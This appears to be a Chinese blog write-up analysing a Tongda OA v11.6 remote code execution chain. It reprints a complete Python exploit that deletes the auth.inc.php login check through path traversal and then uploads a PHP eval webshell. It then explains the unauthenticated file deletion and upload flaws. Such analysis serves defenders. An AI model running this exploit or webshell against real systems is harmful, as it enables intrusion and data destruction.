通达OA v11.6 RCE漏洞分析

news/2024/11/8 14:50:06/

hvv爆出rce按照网上exp进行复现成功获取shell,复现方式自行搜索(很多)
比较好奇 为什么要删除文件
这里从exp着手分析

import requeststarget="http://10.6.6.91:7890/"
payload="<?php eval($_POST['z1feiyu']);?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:print("[-]Failed to deleted auth.inc.php")exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=tql&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('z1feiyu.php', payload)}
requests.post(url=url,files=files)
url=target+"/_z1feiyu.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:print("[+]Filed Uploaded Successfully")print("[+]URL:",url)
else:print("[-]Failed to upload file")

1、首先这里访问/module/appbuilder/assets/print.php删除了webroot/inc/auth.inc.php
查看webroot/inc/auth.inc.php文件并使用zend解码
在这里插入图片描述

解密网址:https://dezend.qiling.org/free
在这里插入图片描述

从包含文件可以发现是对登陆的校验文件

2、检查/module/appbuilder/assets/print.php文件 (未授权访问导致产生文件删除漏洞)

在这里插入图片描述

这里可以看到 页面获取 guid参数的值
使用file_exists函数判断文件是否存在 并未进行校验 就执行unlink删除文件

3、exp中访问/general/data_center/utils/upload.php文件上传
在这里插入图片描述

调用action=upload上传文件
传入不存在的filetype 进入漏洞点
在这里插入图片描述

在这里分析的不是很明白仅写出自己的想法

自己的想法:
根据exp构造了上传文件名和内容 {‘FILE1’: (‘z1feiyu.php’, payload)}
同时利用file_exists函数的漏洞构造/.<>./.<>./.<>./ 逃逸出来
也就是说在这里构造访问上传后
file_exists判断存在将文件加_拼接目录移动到根目录下并删除原文件

总体的根据exp分析 首先存在了任意文件删除漏洞
然后删除登陆校验文件,进而导致任意文件上传漏洞
组合之后也就是现在的rce漏洞

file_exists特性绕过参考文章:https://www.freebuf.com/articles/web/53656.html


http://www.ppmy.cn/news/153509.html

相关文章

**The sip module implements API v11.0 to v11.2 but the PyQt5.QtCore module requires API v11.3**

*The sip module implements API v11.0 to v11.2 but the PyQt5.QtCore module requires API v11.3* 情况一 SIP版本不匹配 我在使用PyQt5时遇到了这个问题&#xff1a;“sip模块实现了API v11.0到v11.2&#xff0c;但PyQt5.QtWidgets模块需要API v11.3”pip列表sip 4.18&…

通达OA 漏洞复现之第一篇v11.x-v11.5任意用户登录

文章目录 漏洞简介漏洞原理影响范围环境搭建第一步 一路下一步安装第二步 设置端口第三步 本地访问漏洞复现方式一:抓包获取cookie信息第一步 访问/general/login_code.php第二步 提交数据到 /logincheck_code.php,获得Set-Cookie信息。第三步 验证登录/general/index.php方式…

MSMG ToolKit v11.2 DL

友情提醒一下&#xff0c;建议使用原版。精简操作系统要是被后门 看不懂英文的可以百度翻译&#xff0c;时间久了就明白嘛意思了 无非就那几个单词。如真要使用汉化版&#xff0c;优化版的 看好你的核心bin文件夹 MSMG ToolKit - By https://msmgtoolkit.in v11.2 Updated…

macOS Big Sur 11 v11.2beta2版

全新的macOS 11.0系统现已正式发布。最新系统macOS 11.0被命名为“Big Sur”&#xff0c;同时本次更新也被苹果称为macOS有史以来的最大更新。全新macOS 11.0系统包括适用于Dock的新设计&#xff0c;诸如信息之类的应用以及诸如照片和邮件之类的应用的新UI等等。 macOS Big Sur…

如何基于CCS_V11新建TMS320F28035的工程

首先我们要创建工程的话&#xff0c;需要下载TI的编译器CCS&#xff0c;我这里是安装了CCS_V11版本&#xff0c;关于如何安装&#xff0c;推荐这篇博客&#xff1a;https://blog.csdn.net/qq_36788698/article/details/82913956?ops_request_misc&request_id&biz_id10…

Sametime V10及V11、V12

大家好&#xff0c;才是真的好。今天我们谈谈Sametime V10以及V11、V12等等&#xff0c;要是没猜错的话&#xff0c;很多人对Sametime是陌生的&#xff0c;有概念的人认为它是一个企业级的即时通信&#xff08;平台&#xff09;工具&#xff1b;没概念的人&#xff0c;可能认为…

MicroStation V8i简体中文版完全补丁安装教程(附安装包下载)

MicroStation是一款非常不错的二维和三维设计软件,由奔特力(Bentley)工程软件系统有限公司开发的一款软件。在CAD设计上该软件是和AutoCAD是齐名的软件,其专用的文件格式是DGN,当然该软件还兼容AutoCAD的DWG/DXF等格式,该软件的应用已经非常广泛,在建筑、土木工程、交通…

V5.1.1,新版发布|软件安全大于一切

主要内容&#xff1a;本次版本除了常规的BUG修复&#xff0c;最重要的是对系统安全全面升级&#xff0c;加强了系统安全检测机制&#xff0c;更新了Thinkphp核心版本&#xff0c;强化了密码等安全。 本次新增了在线用户&#xff0c;支持在线用户下强制下线处理。 本次新增的超…